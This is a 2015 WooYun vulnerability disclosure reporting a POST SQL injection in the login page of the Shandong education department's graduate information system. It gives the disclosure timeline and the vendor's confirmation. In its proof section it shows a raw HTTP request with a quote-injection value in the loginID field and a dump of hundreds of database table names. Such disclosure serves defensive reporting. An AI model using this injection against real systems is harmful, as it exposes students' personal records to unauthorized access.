当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139883

漏洞标题:山东省教育厅高校毕业生系统SQL注射(涉及20库/全省高校毕业信息/信息量庞大)

相关厂商:山东省教育厅

漏洞作者: 路人甲

提交时间:2015-09-11 12:29

修复时间:2015-10-29 08:40

公开时间:2015-10-29 08:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-11: 细节已通知厂商并且等待厂商处理中
2015-09-14: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-24: 细节向核心白帽子及相关领域专家公开
2015-10-04: 细节向普通白帽子公开
2015-10-14: 细节向实习白帽子公开
2015-10-29: 细节向公众公开

简要描述:

详细说明:

**.**.**.**:8088/ 出在高校登录窗口,未过滤POST注入
涉及20库。全省高校毕业生信息,数据量过于庞大,当前库654表,

漏洞证明:

POST /checkLogin.jsp HTTP/1.1
Host: **.**.**.**:8088
Content-Length: 64
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**:8088/login.jsp
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=601EF45D0C88618E29D49D1C9B542F7D
loginID=aaaa%27&usersPwd=aaa&affixCode=9283&usertype=3&x=57&y=10

POST数据包

111.png

222.png

Database: EDU
[654 tables]
+------------------------------+
| AREA_BD_2013 |
| DICT_AREA2012 |
| DICT_BZ_SPECIALITY1205 |
| DICT_DEGREE |
| DICT_FORELANGUAGE |
| DICT_GRADUTETYPE |
| DICT_JOBTYPE |
| DICT_NATION |
| DICT_POLITY |
| DICT_SCHOOL |
| DICT_SCHOOL_2010 |
| DICT_SCHOOL_NORMAL |
| DICT_SEX |
| DICT_SPECIALTY_2006 |
| DICT_Y_CULTMODE |
| DICT_Y_SPEC2012 |
| DICT_Y_SPECIAITY1205 |
| DWXZDM |
| EXAMRESULT |
| JYFA2008_BAK2 |
| LSBMDM |
| LUDONG1 |
| OLD_TEM_RESUME |
| QYDM |
| SCHOOL_JYFA_LX |
| SZYF_2009 |
| SZYF_FLAG |
| TBL_BDZSCHEME_11067_2 |
| TBL_BDZSCHEME_11067_DJY |
| TBL_BDZSCHEME_12440 |
| TBL_BDZSCHEME_13777 |
| TBL_BDZSCHEME_13998 |
| TBL_DANGAN1 |
| TBL_DBZCONFIG |
| TBL_DEPART |
| TBL_DICT_DWLSBM |
| TBL_DICT_PROVINCE |
| TBL_EDUCATIONINFO |
| TBL_EDUCATIONINFO_TREATY |
| TBL_EDUMANAGER |
| TBL_ENLISTEE |
| TBL_ENLISTEE1 |
| TBL_ERRGRAD |
| TBL_FOREIGNLANGUAGE |
| TBL_GRABASE |
| TBL_GRABASE_2006 |
| TBL_GRABASE_2007 |
| TBL_GRABASE_TREATY |
| TBL_GRADBASEERR |
| TBL_GRADBASELOGIN |
| TBL_GRADBASELOGINOUT |
| TBL_GRADBASELOGIN_2006 |
| TBL_GRADBASELOGIN_2007 |
| TBL_GRADBASELOGIN_21 |
| TBL_GRADBASELOGIN_ISINFO0 |
| TBL_GRADBASELOGIN_LOG |
| TBL_GRADEDU |
| TBL_GRADEDUPX |
| TBL_GRADEDU_PURVIEW |
| TBL_GRADIRECTION |
| TBL_GRADREG |
| TBL_GRADSTATUS |
| TBL_GRADSTATUS2007 |
| TBL_GRADSTATUS2008 |
| TBL_GRADSTATUS_090522 |
| TBL_GRADSTATUS_1_110 |
| TBL_GRADSTATUS_2007_2008 |
| TBL_GRADSTATUS_ALL |
| TBL_GRADSTATUS_BAK_0901 |
| TBL_GRADSTATUS_ERR |
| TBL_GROUP |
| TBL_GUESTBOOK |
| TBL_GUESTBOOK_COMPANY |
| TBL_HDCWXXB |
| TBL_HIGHSCHOOL |
| TBL_HIGHSCHOOL_20090619 |
| TBL_IMG |
| TBL_JIEYUE |
| TBL_JOB |
| TBL_JOB_20090619 |
| TBL_JYFA |
| TBL_JYPROJECTK |
| TBL_LATECHG_STUINFO |
| TBL_LATECHG_TIME |
| TBL_LEAVEMESSAGE |
| TBL_LETTER |
| TBL_LINSHI_ZHANG |
| TBL_LINYISF |
| TBL_LOG |
| TBL_LOG_SN |
| TBL_LOG_SN1 |
| TBL_LSB |
| TBL_LSB20091031 |
| TBL_LSB20100401 |
| TBL_LSBBF |
| TBL_MAKERESUME |
| TBL_MESSAGE |
| TBL_MESSAGE_OLD |
| TBL_MF_COMCOLLECTION |
| TBL_MF_GRABASE |
| TBL_MF_GRADSTATUS |
| TBL_MF_MIANSHI |
| TBL_MF_SENDRESUME |
| TBL_MF_SIGN |
| TBL_MF_STUDENT |
| TBL_MF_SYS_STUREG |
| TBL_MF_TREATY |
| TBL_MF_ZHIWEI |
| TBL_MIANSHI |
| TBL_MYSEARCH |
| TBL_NEW_BDZSCHE |
| TBL_NOSOURCEID |
| TBL_OUTTREATY_20090619 |
| TBL_OUTTREATY_20120603 |
| TBL_OUT_STUDENT |
| TBL_PROVINCE |
| TBL_PURVIEW |
| TBL_PURVIEW1 |
| TBL_PURVIEW_NEW |
| TBL_QUESTIONANS |
| TBL_STUDENT2013 |
| TBL_ZBSJ_2011_ZSB2 |
| TBL_ZBSJ_2012 |
| TD_COLUMN |
| TD_COURSE |
| TD_GRADBASICINFO |
| TD_GRADBASICINFO2010 |
| TD_GRADBASICINFO_20091108 |
| TD_GRADBASICINFO_20091108BAK |
| TD_GRADBASICINFO_2010 |
| TD_GRADBASICINFO_MUL |
| TD_GRADBASICINFO_UPLOAD |
| TD_GRADEBASICINF_UPLOAD1 |
| TD_GRADRESULT |
| TD_RESUME |
| TEMP1 |
| TEMP20091103 |
| TEMP20091204 |
| TEMPZYDM |
| TEMPZYDM1 |
| TEMPZYDM2 |
| TEMPZYDM3 |
| TEMP_06ZSB |
| TEMP_07ZSB |
| TEMP_20100413 |
| TEMP_BS07 |
| TEMP_BZMOD |
| TEMP_SS07 |
| TEMP_STUDENT_SOURCE_20100527 |
| TEM_RESULT |
| TEM_RESUME |
| TEST |
| T_08ZK |
| T_LQK2013 |
| ZY_BD_2013 |
| DICT_AREA2012 |

部分表,居于篇幅,所有高校信息都在里面,数据量庞大,只证明存在危害

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-14 08:39

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无